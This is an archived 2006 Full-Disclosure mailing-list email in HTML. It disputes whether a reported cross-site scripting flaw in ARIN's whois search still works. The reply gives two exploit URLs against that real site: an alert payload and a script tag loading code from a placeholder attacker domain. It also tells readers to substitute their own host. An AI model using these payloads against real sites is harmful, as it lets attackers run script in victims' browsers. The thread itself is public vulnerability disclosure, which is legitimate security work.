<HTML><HEAD></HEAD>
<BODY>
<DIV id=idOWAReplyText89804 dir=ltr>
<DIV dir=ltr><FONT face=Arial color=#000000 size=2>Dave,</FONT></DIV>
<DIV dir=ltr><FONT face=Arial size=2></FONT> </DIV>
<DIV dir=ltr><FONT face=Arial size=2>You need to copy and paste the full URL into your browser for the XSS to take place. All exploit examples are still working as I just verified.</FONT></DIV>
<DIV dir=ltr><FONT face=Arial size=2></FONT> </DIV>
<DIV dir=ltr><FONT face=Arial size=2><copy> </FONT><A href="http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E" target=_blank>http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</A> </paste></DIV>
<DIV dir=ltr> </DIV>
<DIV dir=ltr><copy> <A href="http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E" target=_blank>http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E</A> </paste></DIV>
<DIV dir=ltr> </DIV>
<DIV dir=ltr>For my second example I used a fake domain name as an example of where the malicious code could be executed. Change the "maliciouscode.net" to a domain hosting your .js code for the exploit to take effect.</DIV>
<DIV dir=ltr> </DIV>
<DIV dir=ltr>Thanks,</DIV>
<DIV dir=ltr> </DIV>
<DIV dir=ltr><FONT face=Arial size=2>Discovered by Terminal Entry security [.at.] peadro (.)net</FONT></DIV></DIV>
<DIV dir=ltr><BR>
<HR tabIndex=-1>
-----Original Message-----<BR>From: full-disclosure-bounces@lists.grok.org.uk<BR>[mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of Dave<BR>Korn<BR>Sent: Friday, March 03, 2006 9:53 AM<BR>To: full-disclosure@lists.grok.org.uk<BR>Cc: bugtraq@securityfocus.com<BR>Subject: [Full-disclosure] Re: Arin.net XSS<BR><BR>"Terminal Entry" <Security@peadro.net> wrote in message <BR>news:353A3025-099E-41C9-978B-A57B2C80AAE6@mimectl...<BR><BR>> Notification<BR>> Multiple attempts to contact Arin site administrators went unanswered<BR><BR> Looks like someone was paying at least some attention, because none of<BR>your examples worked when I tried them just now.<BR><BR>> Some demonstration exploit URLs are provided:<BR>><BR>http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%<BR>28%27XSS%27%29%3B%22%3E<BR><BR>No match found for <IMG SRC="javascript:alert('XSS');">.<BR><BR>><BR>http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fmalici<BR>ousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E<BR><BR>No match found for <XCRIPT<BR>SRC=http://maliciousCode.net/exploit.js></XCRIPT>.<BR><BR>[ Funnily enough it goes bold after 'SRC=' and the rest of the thing<BR>turns<BR>into a borken link to "http://maliciousCode.net/exploit.js></XCRIPT>" ]<BR><BR>><BR>http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%<BR>28%27XSS%27%29%3B%22%3E<BR><BR>No match found for <IMG SRC="javascript:alert('XSS');">.<BR><BR> cheers,<BR> DaveK<BR>-- <BR>Can't think of a witty .sigline today....<BR><BR><BR><BR><BR><BR>_______________________________________________<BR>Full-Disclosure - We believe in it.<BR>Charter: http://lists.grok.org.uk/full-disclosure-charter.html<BR>Hosted and sponsored by Secunia - http://secunia.com/<BR></DIV></BODY><!--[object_id=#peadro.net#]--><P>
<HR>
<EM><FONT face=Arial size=2>This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.</FONT></EM></P></HTML>